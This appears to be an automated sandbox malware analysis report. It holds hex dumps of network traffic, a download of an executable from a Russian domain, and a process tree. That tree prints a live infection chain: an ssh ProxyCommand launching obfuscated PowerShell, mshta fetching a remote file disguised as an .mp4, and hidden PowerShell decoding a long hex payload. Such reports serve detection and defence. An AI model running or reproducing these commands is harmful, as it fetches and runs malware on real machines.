                                                        2024-12-27 07:47:46 UTC8000INData Raw: 03 e5 a8 f4 29 24 68 e6 53 16 d4 f3 58 ee dd df d3 15 ab 50 5b da c7 6e 8e 91 e7 0e c5 8e 4f 73 40 11 ea 16 90 dd 40 4c a4 82 a0 90 c0 f4 a3 4b 67 7d 3a 13 21 c9 c7 5f 51 4c 4d 2a dd 46 37 4a c9 9c ec 2e 71 57 40 0a 00 03 00 70 05 00 2d 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05
                                                        Data Ascii: )$hSXP[nOs@@LKg}:!_QLM*F7J.qW@p-Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@
                                                        2024-12-27 07:47:47 UTC8000INData Raw: 28 a2 8a 00 28 a2 8a 00 29 1b a7 e3 4b 48 dd 3f 11 40 0b 45 54 d4 e5 9a 1b 37 96 06 0a 50 64 e4 66 a6 b6 73 25 b4 4e c7 25 94 13 f9 50 04 b4 54 53 5c 47 0b c6 8c 7e 69 1b 6a 8a 24 b8 48 e5 8e 26 3f 34 87 00 50 04 b5 5a f2 c9 2f 15 56 47 70 14 e4 05 3d ea ce 45 20 60 dd 08 3f 43 40 09 1a ec 40 bb 8b 63 b9 eb 4e a4 0c 09 20 10 48 ea 2a b4 ee cf 7d 04 2a 48 03 32 36 0f 6e 80 50 05 aa 86 eb fd 49 a8 6e 37 4d 78 90 24 8c 81 14 bb 15 f7 e0 7f 5a a9 63 2b 1d 3e 63 2c 85 f6 ca 46 e6 34 01 7e cf ee 1a b1 55 2c a5 43 0b 1d c0 01 d4 e7 a5 4d 1d cc 12 b6 d8 e5 46 6f 40 68 01 65 fb f1 7f bf fd 0d 2c bf ea db e9 59 f3 a9 4d 6e 12 19 88 75 24 82 78 14 fb 84 81 f5 05 7f b4 62 55 42 3c b0 68 02 54 51 e7 23 01 ce 07 35 6e b3 fe d3 12 30 2d 22 80 a3 9e 7a 55 b8 6e 61 9e 33
                                                        Data Ascii: (()KH?@ET7Pdfs%N%PTS\G~ij$H&?4PZ/VGp=E `?C@@cN H*}*H26nPIn7Mx$Zc+>c,F4~U,CMFo@he,YMnu$xbUB<hTQ#5n0-"zUna3
                                                        2024-12-27 07:47:47 UTC8000INData Raw: 0a 28 a2 80 0a 28 a2 80 0a 28 a3 bd 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 07 a5 44 bf eb 4d 4b 51 0f f5 c6 80 25 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2
                                                        Data Ascii: (((QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEDMKQ%((((((((((
                                                        2024-12-27 07:47:47 UTC8000INData Raw: b2 9e 40 a0 0a 77 e7 ec 90 c5 22 ce e6 e0 10 58 17 cf 6f 4a d3 b8 5f 3a cf 25 99 7e 50 df 29 c5 63 6a 13 59 1d 39 52 d5 83 1c e5 b8 e7 a7 73 57 86 a7 69 f6 54 8b cd f9 99 30 3e 53 c9 c5 00 56 bc 56 8a d0 c8 92 3e e2 33 9c f4 ab 57 70 ed d2 0b ac 92 07 54 dc 1b 79 ce 6a be a7 84 d3 f0 48 ce d1 56 27 b8 85 b4 36 6f 31 48 31 60 73 df 1d 28 02 23 b2 3d 15 59 9e 46 92 44 dc 30 e7 25 b1 fc aa 4d 2e 04 9b 4b 06 42 ec 64 1f 31 2c 73 50 e9 fe 57 f6 53 4f 2c 81 d9 62 29 fe e0 c7 4a 9b 44 9e 3f ec b5 05 c0 f2 f3 bb 3d a8 02 b6 92 f6 c9 14 c2 e2 61 bf 71 4f 9d ff 00 86 9f a4 c7 0b df dd 32 1d ea 8d f2 1c e4 01 46 8a 60 7f b4 2b 28 2d e6 16 19 5f e1 a5 d3 65 8d 75 5b b5 50 55 5c fc bc 60 1a 03 51 22 b7 86 3d 7e 45 da 02 08 b7 e0 f4 07 3d 6a 19 04 57 1a dc 24 45 88 9f
                                                        Data Ascii: @w"XoJ_:%~P)cjY9RsWiT0>SVV>3WpTyjHV'6o1H1`s(#=YFD0%M.KBd1,sPWSO,b)JD?=aqO2F`+(-_eu[PU\`Q"=~E=jW$E
                                                        2024-12-27 07:47:47 UTC8000INData Raw: 14 00 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 53 64 fb a3 ea 29 d4 d9 3e ef e2 28 01 d4 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 15 52 6b eb 5f 2d 87 da 23 cf a6 ea b7 58 9a 84 6a 35 a8 70 a3 e6 4e 78 fa d0 05 9b 1b cb 74 46 0f 2a a9 27 8c 9a b4 97 d6 b2 38 44 99 59 89 c0 02 a1 d3 51 7c b7 f9 47 5f 4a af a2 85 59 ef 30 00 c4 87 fa d0 06 84 ff 00 eb 21 ff 00 7f fa 1a 7c df ea 5f e8 6a 9d c5 fd b7 9f 1a 89 94 94 6c b6 3a 0e 29 cb a8 5b 5d 24 89 0c 99 60 a7 8c 62 80 1d ff 00 2d 22 fc 3f 95 5b ac d6 bc 88 48 9c b7 cb 8c 8d a6 a7 9f 52 b7 b7 90 24 85 c3 1e 83 61 e6 80 2d d1 50 4d 77 1c 36 e2 77 57 d8 7d 17 91 f5 aa f2 6a d0 c6 01 78 a6 55 27 00 94 eb 40 17 e8 a8 1a ea 34 b5 fb 44 81 91 71 d1 87 35 58 ea 82 3d ad
                                                        Data Ascii: QEQEQEQEQEQEQESd)>(QEQEQEQERk_-#Xj5pNxtF*'8DYQ|G_JY0!|_jl:)[]$`b-"?[HR$a-PMw6wW}jxU'@4Dq5X=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.1049741150.241.97.10443180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-27 07:47:50 UTC56OUTGET /mama.exe HTTP/1.1
                                                        Host: pravo-bashkortostan.ru
                                                        2024-12-27 07:47:51 UTC273INHTTP/1.1 200 OK
                                                        Date: Fri, 27 Dec 2024 07:47:51 GMT
                                                        Server: Apache/2.4.52 (Ubuntu)
                                                        Last-Modified: Mon, 23 Dec 2024 10:31:56 GMT
                                                        ETag: "414400-629ed81723f00"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 4277248
                                                        Connection: close
                                                        Content-Type: application/x-msdos-program
                                                        2024-12-27 07:47:51 UTC7919INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: MZP@!L!This program must be run under Win32$7
                                                        2024-12-27 07:47:51 UTC8000INData Raw: 40 00 01 00 00 00 00 02 00 fc 2a 40 00 14 09 50 56 61 72 41 72 72 61 79 10 2b 40 00 02 00 00 00 00 14 2b 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 cc 10 40 00 02 00 00 00 02 05 46 6c 61 67 73 02 00 9c 10 40 00 04 00 00 00 02 0b 45 6c 65 6d 65 6e 74 53 69 7a 65 02 00 9c 10 40 00 08 00 00 00 02 09 4c 6f 63 6b 43 6f 75 6e 74 02 00 00 11 40 00 0c 00 00 00 02 04 44 61 74 61 02 00 cc 2a 40 00 10 00 00 00 02 06 42 6f 75 6e 64 73 02 00 02 00 00 00 00 a8 2b 40 00 0e 0a 54 56 61 72 52 65 63 6f 72 64 08 00 00 00 00 00 00 00 00 02 00 00 00 00 11 40 00 00 00 00 00 02 07 50 52 65 63 6f 72 64 02 00 00 11 40 00 04 00 00 00 02 07 52 65 63 49 6e 66 6f 02 00 02 00 00 00 00 f0 2b
                                                        Data Ascii: @*@PVarArray+@+@TVarArray@DimCount@Flags@ElementSize@LockCount@Data*@Bounds+@TVarRecord@PRecord@RecInfo+
                                                        2024-12-27 07:47:51 UTC8000INData Raw: 00 00 02 00 00 38 4a 40 00 14 0a 50 54 79 70 65 54 61 62 6c 65 10 4a 40 00 02 00 00 00 50 4a 40 00 14 10 50 50 61 63 6b 61 67 65 54 79 70 65 49 6e 66 6f 68 4a 40 00 02 00 6c 4a 40 00 0e 10 54 50 61 63 6b 61 67 65 54 79 70 65 49 6e 66 6f 10 00 00 00 00 00 00 00 00 04 00 00 00 9c 10 40 00 00 00 00 00 02 09 54 79 70 65 43 6f 75 6e 74 02 00 34 4a 40 00 04 00 00 00 02 09 54 79 70 65 54 61 62 6c 65 02 00 9c 10 40 00 08 00 00 00 02 09 55 6e 69 74 43 6f 75 6e 74 02 00 34 29 40 00 0c 00 00 00 02 09 55 6e 69 74 4e 61 6d 65 73 02 00 02 00 00 00 00 e8 4a 40 00 11 13 54 41 72 72 61 79 3c 53 79 73 74 65 6d 2e 42 79 74 65 3e 01 00 00 00 00 00 00 00 11 00 00 00 b4 10 40 00 06 53 79 73 74 65 6d b4 10 40 00 02 00 00 00 20 4b 40 00 11 13 54 41 72 72 61 79 3c 53 79 73 74 65
                                                        Data Ascii: 8J@PTypeTableJ@PJ@PPackageTypeInfohJ@lJ@TPackageTypeInfo@TypeCount4J@TypeTable@UnitCount4)@UnitNamesJ@TArray<System.Byte>@System@ K@TArray<Syste
                                                        2024-12-27 07:47:51 UTC8000INData Raw: ff 0f b7 00 83 e8 04 89 85 e4 47 fe ff c6 85 f6 47 fe ff 00 bf ff 00 00 00 8b 85 dc 47 fe ff 8b f0 8d 85 db ff fd ff 3b d8 0f 87 2c 01 00 00 83 3e 00 0f 86 16 01 00 00 80 bd f7 47 fe ff 00 75 21 a1 58 f0 7e 00 e8 6a 37 00 00 8b c8 8b d3 a1 58 f0 7e 00 e8 c4 f9 ff ff 8b d8 c6 85 f7 47 fe ff 01 80 bd f6 47 fe ff 00 75 56 c6 03 0d 43 c6 03 0a 43 8b 85 e8 47 fe ff 40 8b d3 e8 4c f9 ff ff 8b d8 c6 03 20 43 c6 03 2d 43 c6 03 20 43 8b d3 8b 85 e4 47 fe ff e8 31 f9 ff ff 8b d8 a1 60 f0 7e 00 e8 0d 37 00 00 8b c8 8b d3 a1 60 f0 7e 00 e8 67 f9 ff ff 8b d8 c6 85 f6 47 fe ff 01 eb 08 c6 03 2c 43 c6 03 20 43 8b c7 83 e8 01 72 07 74 21 48 74 3a eb 54 a1 64 f0 7e 00 e8 d4 36 00 00 8b c8 8b d3 a1 64 f0 7e 00 e8 2e f9 ff ff 8b d8 eb 44 a1 68 f0 7e 00 e8 b8 36 00 00 8b c8
                                                        Data Ascii: GGG;,>Gu!X~j7X~GGuVCCG@L C-C CG1`~7`~gG,C Crt!Ht:Td~6d~.Dh~6
                                                        2024-12-27 07:47:51 UTC8000INData Raw: c3 53 56 57 55 83 c4 f0 8b fa 8b f0 8b 6e 10 8b c6 e8 77 04 00 00 88 04 24 80 3c 24 00 0f 85 67 01 00 00 85 ff 0f 84 5f 01 00 00 c6 44 24 01 00 85 ed 0f 8e 92 00 00 00 e8 2c c9 ff ff 89 44 24 04 33 c0 89 44 24 0c 85 ed 7e 5a 83 ff ff 74 16 e8 14 c9 ff ff 2b 44 24 04 3b f8 77 09 c6 04 24 00 e9 24 01 00 00 83 3e 01 7f 3a 83 3e 00 75 27 33 c0 ba 01 00 00 00 f0 0f b1 16 85 c0 75 18 e8 c5 c7 ff ff 89 46 08 c7 46 04 01 00 00 00 c6 04 24 01 e9 f3 00 00 00 8d 44 24 0c e8 1d fc ff ff 4d 85 ed 7f a6 83 ff ff 74 20 e8 ba c8 ff ff 89 44 24 08 8b 44 24 08 2b 44 24 04 3b f8 77 09 c6 04 24 00 e9 c2 00 00 00 2b f8 8b 1e 85 db 0f 84 3b ff ff ff 8d 53 02 8b c3 f0 0f b1 16 3b d8 75 e9 e8 83 c8 ff ff 89 44 24 04 8b c6 e8 08 01 00 00 8b d0 8b 1d fc 78 7f 00 8b cf 33 c0 ff 53
                                                        Data Ascii: SVWUnw$<$g_D$,D$3D$~Zt+D$;w$$>:>u'3uFF$D$Mt D$D$+D$;w$+;S;uD$x3S
                                                        2024-12-27 07:47:51 UTC8000INData Raw: ff c3 8d 40 00 31 c9 85 d2 74 13 0f b7 4a f4 ff 34 24 89 4c 24 04 8b 4a fc e9 5b f6 ff ff e9 ea f6 ff ff c3 90 31 c9 85 d2 74 05 8b 4a fc d1 e9 e9 b8 f5 ff ff c3 8d 40 00 31 c9 85 d2 74 03 8b 4a fc e9 d6 f5 ff ff c3 90 53 56 81 c4 00 fe ff ff 8b d9 8b f0 81 fb ff 00 00 00 7e 05 bb ff 00 00 00 8b c2 85 c0 74 05 83 e8 04 8b 00 3b d8 7f 02 8b c3 85 c0 75 04 33 c0 eb 1f 50 8d 44 24 04 8b ca ba ff 01 00 00 e8 29 f5 ff ff 85 c0 7d 04 33 c0 eb 06 3b d8 7d 02 8b c3 88 06 85 c0 7e 0b 8d 56 01 8b cc 91 e8 62 c7 ff ff 81 c4 00 02 00 00 5e 5b c3 90 31 c9 8a 0a 42 e9 4e f6 ff ff c3 90 53 56 57 89 c3 89 d6 31 ff 85 d2 7e 64 8b 03 85 c0 74 3d 83 78 f8 01 75 37 83 e8 0c 01 d2 70 2b 83 c2 0e 70 26 50 89 e0 e8 af c5 ff ff 58 83 c0 0c 89 03 89 70 fc 66 c7 04 70 00 00 85 ff
                                                        Data Ascii: @1tJ4$L$J[1tJ@1tJSV~t;u3PD$)}3;}~Vb^[1BNSVW1~dt=xu7p+p&PXpfp
                                                        2024-12-27 07:47:51 UTC8000INData Raw: e9 00 cb ff ff eb eb 5e 5b 8b e5 5d c3 b0 04 02 00 ff ff ff ff 01 00 00 00 2c 00 00 00 55 8b ec 81 c4 98 fe ff ff 53 56 57 33 c9 89 8d a0 fe ff ff 89 8d 9c fe ff ff 89 8d 98 fe ff ff 89 55 fc 8b f0 33 c0 55 68 b1 c8 40 00 64 ff 30 64 89 20 8b 45 fc e8 cd d4 ff ff 66 3b 35 00 fa 7e 00 72 54 66 3b 35 00 fc 7e 00 77 4b bf 40 00 00 00 33 c0 89 45 f8 3b 7d f8 72 3c 8b df 03 5d f8 d1 eb 66 3b 34 dd 00 fa 7e 00 73 05 8b fb 4f eb 21 66 3b 34 dd 00 fa 7e 00 76 06 43 89 5d f8 eb 11 8b 55 fc 8b 04 dd 04 fa 7e 00 e8 8f fe ff ff eb 05 3b 7d f8 73 c4 8b 45 fc 83 38 00 0f 85 a3 00 00 00 6a 02 0f b7 c6 50 e8 b5 89 ff ff 85 c0 0f 84 90 00 00 00 6a 55 8d 85 4e ff ff ff 50 6a 59 0f b7 de 53 e8 79 89 ff ff 6a 55 8d 85 a4 fe ff ff 50 6a 5a 53 e8 68 89 ff ff 8d 85 a0 fe ff ff
                                                        Data Ascii: ^[],USVW3U3Uh@d0d Ef;5~rTf;5~wK@3E;}r<]f;4~sO!f;4~vC]U~;}sE8jPjUNPjYSyjUPjZSh
                                                        2024-12-27 07:47:51 UTC8000INData Raw: 68 d1 e6 40 00 64 ff 32 64 89 22 8b 45 fc 8d 04 b0 8d 4d f0 8b d3 e8 86 fa ff ff 89 45 ec 83 7d ec 00 75 1f 8b 45 fc 8b d3 e8 ff fb ff ff 8b d8 8b 45 fc 8d 04 b0 8b cb 8b 55 f0 e8 a1 f9 ff ff 89 5d ec 33 c0 5a 59 59 64 89 10 68 d8 e6 40 00 8b 45 f4 8d 04 40 8b 55 fc 8d 04 82 e8 6c fb ff ff c3 e9 5e ab ff ff eb e7 8b 45 ec 89 45 e8 8b 45 e8 8d 90 84 00 00 00 8b 45 e8 8b 4d f8 e8 9a f7 ff ff 5e 5b 8b e5 5d c3 55 8b ec 83 c4 e8 53 56 8b d9 89 55 f8 89 45 fc 8b 45 fc 80 b8 48 09 00 00 00 0f 84 8f 00 00 00 8b cb 8b c1 c1 e8 0d c1 e9 05 03 c1 b9 c5 00 00 00 99 f7 f9 89 55 f4 8b 75 f4 8d 34 76 8b 45 fc 8d 04 b0 e8 94 fa ff ff 33 d2 55 68 80 e7 40 00 64 ff 32 64 89 22 8b 45 fc 8d 04 b0 8d 4d f0 8b d3 e8 b2 f9 ff ff 89 45 ec 33 c0 5a 59 59 64 89 10 68 87 e7 40 00
                                                        Data Ascii: h@d2d"EME}uEEU]3ZYYdh@E@Ul^EEEEM^[]USVUEEHUu4vE3Uh@d2d"EME3ZYYdh@
                                                        2024-12-27 07:47:51 UTC8000INData Raw: 8d 7d a8 89 55 e8 56 be 5c fc 7e 00 b9 09 00 00 00 f3 a5 5e 89 75 ac 8b 45 0c 89 45 b0 8b 55 d0 89 55 b4 f6 45 cc 01 75 28 8b 0d 80 fc 7e 00 89 4d fc 8d 45 a8 89 45 fc 8d 55 fc 52 6a 01 6a 00 68 57 00 6d c0 e8 1b f9 ff ff 33 c0 e9 10 02 00 00 8b 55 d4 8b 45 0c 2b 45 d8 85 c0 8b 1a 79 03 83 c0 03 c1 f8 02 89 45 f8 8b 45 f8 8b f8 c1 e7 02 03 7d dc f6 47 03 80 0f 94 c0 83 e0 01 89 45 b8 85 c0 74 11 8b 17 52 e8 f0 03 00 00 59 83 c0 02 89 45 bc eb 0b 8b 0f 81 e1 ff ff 00 00 89 4d bc 33 ff 83 3d 34 a6 7f 00 00 74 17 8d 45 a8 50 6a 00 ff 15 34 a6 7f 00 8b f8 85 ff 74 05 e9 7c 01 00 00 85 db 0f 85 bc 00 00 00 83 3d 34 a6 7f 00 00 74 0e 8d 45 a8 50 6a 01 ff 15 34 a6 7f 00 8b d8 85 db 75 0b 8b 45 b4 50 e8 6e f8 ff ff 8b d8 85 db 75 4b e8 5b f8 ff ff 89 45 c8 83 3d
                                                        Data Ascii: }UV\~^uEEUUEu(~MEEURjjhWm3UE+EyEE}GEtRYEM3=4tEPj4t|=4tEPj4uEPnuK[E=
                                                        2024-12-27 07:47:51 UTC8000INData Raw: 41 00 8b 03 50 e8 d7 f7 ff ff a3 60 a6 7f 00 68 ec 26 41 00 8b 03 50 e8 c5 f7 ff ff a3 64 a6 7f 00 68 18 27 41 00 8b 03 50 e8 b3 f7 ff ff a3 68 a6 7f 00 68 40 27 41 00 8b 03 50 e8 a1 f7 ff ff a3 6c a6 7f 00 68 c4 26 41 00 8b 03 50 e8 8f f7 ff ff a3 70 a6 7f 00 68 ec 26 41 00 8b 03 50 e8 7d f7 ff ff a3 74 a6 7f 00 68 6c 27 41 00 8b 03 50 e8 6b f7 ff ff a3 78 a6 7f 00 68 98 27 41 00 8b 03 50 e8 59 f7 ff ff a3 7c a6 7f 00 68 b8 27 41 00 8b 03 50 e8 47 f7 ff ff a3 80 a6 7f 00 68 d8 27 41 00 8b 03 50 e8 35 f7 ff ff a3 84 a6 7f 00 68 10 28 41 00 8b 03 50 e8 23 f7 ff ff a3 88 a6 7f 00 68 38 28 41 00 8b 03 50 e8 11 f7 ff ff a3 8c a6 7f 00 68 6c 28 41 00 8b 03 50 e8 ff f6 ff ff a3 90 a6 7f 00 68 a0 28 41 00 8b 03 50 e8 ed f6 ff ff a3 94 a6 7f 00 68 c8 28 41 00 8b
                                                        Data Ascii: AP`h&APdh'APhh@'APlh&APph&AP}thl'APkxh'APY|h'APGh'AP5h(AP#h8(APhl(APh(APh(A


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:02:47:32
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)" .
                                                        Imagebase:0x7ff726840000
                                                        File size:946'176 bytes
                                                        MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:1
                                                        Start time:02:47:32
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:02:47:32
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)
                                                        Imagebase:0x7ff7b2bb0000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:7
                                                        Start time:02:47:34
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://pravo-bashkortostan.ru/aaa.mp4"
                                                        Imagebase:0x7ff7b2bb0000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:8
                                                        Start time:02:47:34
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\mshta.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\mshta.exe" https://pravo-bashkortostan.ru/aaa.mp4
                                                        Imagebase:0x7ff7ec3c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:02:47:38
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:13
                                                        Start time:02:47:39
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B